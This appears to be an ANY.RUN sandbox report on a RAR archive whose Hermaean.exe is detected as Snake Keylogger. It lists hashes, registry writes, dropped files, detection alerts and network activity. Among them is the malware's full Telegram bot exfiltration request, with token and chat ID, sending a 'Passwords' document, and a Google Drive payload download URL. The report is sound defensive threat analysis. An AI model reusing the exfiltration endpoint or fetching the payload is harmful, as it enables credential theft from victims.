File name:	7ca204f398d0ca98eb3d2d76c2f05b382341fe416e761cf7e4ebb4c9db5593b5
Full analysis:	https://app.any.run/tasks/0d5478a8-a688-4e40-bb75-a46fb26e35a1
Verdict:	Malicious activity
Threats:	A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	February 10, 2025, 12:16:03
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	arch-exec evasion snake keylogger stealer telegram
Indicators:
MIME:	application/x-rar
File info:	RAR archive data, v4, os: Win32
MD5:	D545C41763960CAD8D25F09410E1CCE6
SHA1:	8DECCB86BD19F75CC07EE30065C8A312C7F6FBC4
SHA256:	7CA204F398D0CA98EB3D2D76C2F05B382341FE416E761CF7E4EBB4C9DB5593B5
SSDEEP:	49152:EFG2aHGF1OUDSI8OYQo7AHlXzoJJLJ47ur3o50PLDKukvNO3qxsKnQ71muSSYJel:EZDSI/lOAHlj86ur450DWukQun8sQR73

.rar	\|	RAR compressed archive (v-4.x) (58.3)
.rar	\|	RAR compressed archive (gen) (41.6)

FileVersion:	RAR v4
CompressedSize:	982729
UncompressedSize:	1070325
OperatingSystem:	Win32
ModifyDate:	2025:02:10 09:48:04
PackingMethod:	Normal
ArchivedFileName:	Hermaean.exe


(PID) Process:	(6548) Hermaean.exe	Key:	HKEY_CURRENT_USER\rugbrdsmotor\Uninstall\monospermy
Operation:	write	Name:	henstilledes
Value: 0
(PID) Process:	(6356) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	3
Value: C:\Users\admin\Desktop\preferences.zip
(PID) Process:	(6356) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	2
Value: C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:	(6356) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:	(6356) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\Desktop\7ca204f398d0ca98eb3d2d76c2f05b382341fe416e761cf7e4ebb4c9db5593b5.rar
(PID) Process:	(6356) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(6356) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(6356) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(6356) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(6548) Hermaean.exe	Key:	HKEY_CURRENT_USER\Undersgelsesagents160\Risikofrieste\Overbookningerne
Operation:	write	Name:	rearanged
Value: 48122C

PID	Process	Filename		Type
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Vandbreren.Ele222		binary
		MD5:431E19CF7E3F9FAC31A8587E61887D34	SHA256:7875CF408FB951BA85811D3BA4A1F095B1C5C645490F95625060261A3946A577
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\histographies.txt		image
		MD5:5A1AD1096F97C0E2239684846D247918	SHA256:85DAE24C3E71F4F1199513FC04BA0B37FEBD6B1E0CFA7819D0555C1F729D0A9F
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\begrdeliges.pro		binary
		MD5:4CDDE62E05107CF3BAD9767453F364D5	SHA256:1C4590DC25D55EA92CFB73656072B854483962DB44F5031382AD92DD4C045013
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.ini		image
		MD5:868F1BE25FA5F82DE53C0CE9EA030CA3	SHA256:46D26ECB7CC6EE16137F12700E0E24425260B1DB361F96B943A0F880B9636A56
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\aktioners.jpg		image
		MD5:B79A2EC8152E04C3DF16B5DF803ED841	SHA256:732D6EFBC54861C4178CAA10058547D42CE85A11B78F1695D307B98C9034B4BF
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.ini		image
		MD5:C994CB2032DBA92B7E631171678EC43D	SHA256:44219644326C2EBD71EA67DF605FC6D907919239B5773925E231210EA4B892CB
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Litiscontest.jpg		image
		MD5:2400D62D49391C7874C3DF868B3399ED	SHA256:59F7A9F0F65EB5BED32B3D5B0429767F6454FAD732BED58781B7E35DB94547C8
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\cartographer.jpg		image
		MD5:C9D3CCBEBDAFAA919122541A202A9733	SHA256:1299E5D382862521FE2904EC67B15647FCC9518BC274789DDD3DFC1B48DACBA8
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tiggerstavens.fes		binary
		MD5:F507FD73B5683DFB9ECE04A486CF8E21	SHA256:9AC75E58593C7C398BD69D638F56A9EDBCC3AB727251F14CDA80D600970FFCBA
6548	Hermaean.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Glorification.Ove0		binary
		MD5:55B588F0F987B1D648722FF23505DF8D	SHA256:A8E01AEC8244DFA8CDEDD12DA3BDFA678042E166BA9FA8E6F4B9ADAE643ED01E

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4712	MoUsoCoreWorker.exe	GET	200	23.53.40.178:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
4712	MoUsoCoreWorker.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	303	142.250.185.78:443	https://drive.google.com/uc?export=download&id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K	unknown	—	—	—
6912	Hermaean.exe	GET	200	132.226.247.73:80	http://checkip.dyndns.org/	unknown	—	—	whitelisted
6912	Hermaean.exe	GET	200	132.226.247.73:80	http://checkip.dyndns.org/	unknown	—	—	whitelisted
6912	Hermaean.exe	GET	200	132.226.247.73:80	http://checkip.dyndns.org/	unknown	—	—	whitelisted
—	—	POST	204	92.123.104.11:443	https://www.bing.com/threshold/xls.aspx	unknown	—	—	whitelisted
—	—	GET	200	172.217.18.1:443	https://drive.usercontent.google.com/download?id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K&export=download	unknown	binary	95.0 Kb	whitelisted
—	—	GET	200	104.21.80.1:443	https://reallyfreegeoip.org/xml/41.230.209.133	unknown	text	327 b	malicious
—	—	POST	200	149.154.167.99:443	https://api.telegram.org/bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendDocument?chat_id=6900395692&caption=admin%20/%20Passwords%20/%2041.230.209.133	unknown	binary	545 b	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:138	—	—	—	whitelisted
4712	MoUsoCoreWorker.exe	20.73.194.208:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
—	—	20.73.194.208:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4712	MoUsoCoreWorker.exe	23.53.40.178:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
4712	MoUsoCoreWorker.exe	95.101.149.131:80	www.microsoft.com	Akamai International B.V.	NL	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
4712	MoUsoCoreWorker.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
3976	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
5064	SearchApp.exe	92.123.104.19:443	www.bing.com	Akamai International B.V.	DE	whitelisted
6912	Hermaean.exe	172.217.16.206:443	drive.google.com	GOOGLE	US	whitelisted

Domain	IP	Reputation
google.com	216.58.212.174	whitelisted
crl.microsoft.com	23.53.40.178 23.53.40.176	whitelisted
www.microsoft.com	95.101.149.131	whitelisted
settings-win.data.microsoft.com	4.231.128.59	whitelisted
www.bing.com	92.123.104.19 92.123.104.18 92.123.104.31 92.123.104.11 92.123.104.13 92.123.104.5 92.123.104.30 92.123.104.10 92.123.104.22	whitelisted
drive.google.com	172.217.16.206	whitelisted
drive.usercontent.google.com	142.250.184.193	whitelisted
checkip.dyndns.org	132.226.247.73 158.101.44.242 193.122.6.168 193.122.130.0 132.226.8.169	whitelisted
reallyfreegeoip.org	104.21.48.1 104.21.16.1 104.21.96.1 104.21.112.1 104.21.80.1 104.21.32.1 104.21.64.1	malicious
api.telegram.org	149.154.167.220	whitelisted

PID	Process	Class	Message
2192	svchost.exe	Device Retrieving External IP Address Detected	ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org)
6912	Hermaean.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup - checkip.dyndns.org
6912	Hermaean.exe	Device Retrieving External IP Address Detected	ET INFO 404/Snake/Matiex Keylogger Style External IP Check
2192	svchost.exe	Device Retrieving External IP Address Detected	INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
6912	Hermaean.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup - checkip.dyndns.org
2192	svchost.exe	Misc activity	ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
6912	Hermaean.exe	Misc activity	ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
2192	svchost.exe	Misc activity	SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2192	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
6912	Hermaean.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)

General Info

7ca204f398d0ca98eb3d2d76c2f05b382341fe416e761cf7e4ebb4c9db5593b5

D545C41763960CAD8D25F09410E1CCE6

8DECCB86BD19F75CC07EE30065C8A312C7F6FBC4

7CA204F398D0CA98EB3D2D76C2F05B382341FE416E761CF7E4EBB4C9DB5593B5

49152:EFG2aHGF1OUDSI8OYQo7AHlXzoJJLJ47ur3o50PLDKukvNO3qxsKnQ71muSSYJel:EZDSI/lOAHlj86ur450DWukQun8sQR73

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Generic archive extractor

Steals credentials from Web Browsers

SNAKEKEYLOGGER has been detected (SURICATA)

Actions looks like stealing of personal data

SUSPICIOUS

Malware-specific behavior (creating "System.dll" in Temp)

Executable content was dropped or overwritten

Reads security settings of Internet Explorer

The process creates files with name similar to system file names

Starts CMD.EXE for commands execution

There is functionality for taking screenshot (YARA)

Executing commands from a ".bat" file

Application launched itself

The process verifies whether the antivirus software is installed

Checks Windows Trust Settings

Checks for external IP

Process communicates with Telegram (possibly using it as an attacker's C2 server)

INFO

Manual execution by a user

Create files in a temporary directory

Creates files or folders in the user directory

Checks supported languages

Reads the computer name

The sample compiled with english language support

Executable content was dropped or overwritten

Checks proxy server information

Reads the machine GUID from the registry

Reads the software policy settings

Disables trace logs

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats